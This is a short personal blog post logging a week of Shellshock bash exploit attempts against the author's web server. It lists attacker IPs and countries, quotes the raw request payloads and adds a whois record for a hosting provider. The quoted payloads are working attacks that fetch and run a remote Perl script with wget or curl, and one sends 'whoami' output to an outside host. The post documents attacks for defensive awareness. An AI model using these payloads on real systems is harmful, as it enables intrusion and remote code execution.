One week of bash exploits

Bananas has other methods to prevent spammy clients from doing stuff if the traffic is even genuine to begin with so in the week after the bash exploit (my blog) no damage was down and twelve attempts by four ip addresses that tried it, (my blog) i think i found a crap provider as well.

I have sanitized the urls so if they dont become hrefs.

who/country count what attempted
146.71.113.194 us 4 GET /cgi-bin/helpme HTTP/1.0″ “() { :;}; /bin/bash -c \”cd /tmp;wget http:/ /213.5.67.223/jurat;curl -O /tmp/jurat http:// 213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\””
139.192.95.179 id 2 GET /cgi-bin/hi HTTP/1.1″ “() { :;};echo efq2ue25qwneth0s63zh$(curl ‘http:// best-home-based-business-idea.com/bash_count.php?%61%6C%61%6E%77%65%73%74%2E%63%6F%6D’; wget -qO- ‘http:// best-home-based-business-idea.com/bash_count.php?%61%6C%61%6E%77%65%73%74%2E%63%6F%6D’;)efq2ue25qwneth0s63zh”
146.71.111.226 us 3 (7 from provider) “GET /cgi-bin/tell HTTP/1.0” “() { :;}; /bin/bash -c \”cd /var/tmp ; rm -rf j* ; wget http:// 89.33.193.10/ji ; lwp-download http:// 89.33.193.10/ji ; curl -O /var/tmp/ji http:// 89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\””
93.174.93.210 nl 2

 

Total 12

“GET / HTTP/1.1” “-” “() { :;}; /bin/bash -c \”curl http:// ntontomou.com/custom/ping.php?domain=\\&whoami=`whoami`\””

ghettoOur lattest iffy neigbourhod is

NetRange:       146.71.96.0 - 146.71.127.255
CIDR:           146.71.96.0/19
OriginAS:       AS53850
NetName:        GSI-146-71-96-0
NetHandle:      NET-146-71-96-0-1
Parent:         NET-146-0-0-0-0
NetType:        Direct Allocation
Comment:        https://support.GorillaServers.com
Comment:        Abuse: abuse@GorillaServers.com
Comment:        Billing: billing@GorillaServers.com
Comment:        Technical Support: support@GorillaServers.com
RegDate:        2014-06-18
Updated:        2014-06-18
Ref:            http://whois.arin.net/rest/net/NET-146-71-96-0-1

OrgName:        GorillaServers, Inc.
OrgId:          GORIL-3
Address:        800 S Hope St
Address:        Suite B100
City:           Los Angeles
StateProv:      CA
PostalCode:     90017
Country:        US
RegDate:        2011-01-28
Updated:        2012-03-12
Ref:            http://whois.arin.net/rest/org/GORIL-3

Nothing ran but i got a new network block

6 responses

  1. Pingback: late to the party bash probers | Bananas in the Falklands

  2. Pingback: China bashing | Bananas in the Falklands

  3. Pingback: Clueless bashing brits | Bananas in the Falklands

  4. Pingback: America and China bashing in the wild | Bananas in the Falklands

  5. Pingback: Dyke bashing | Bananas in the Falklands

  6. Pingback: Apache 2.4 in the wild | Bananas in the Falklands

by golly but...

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s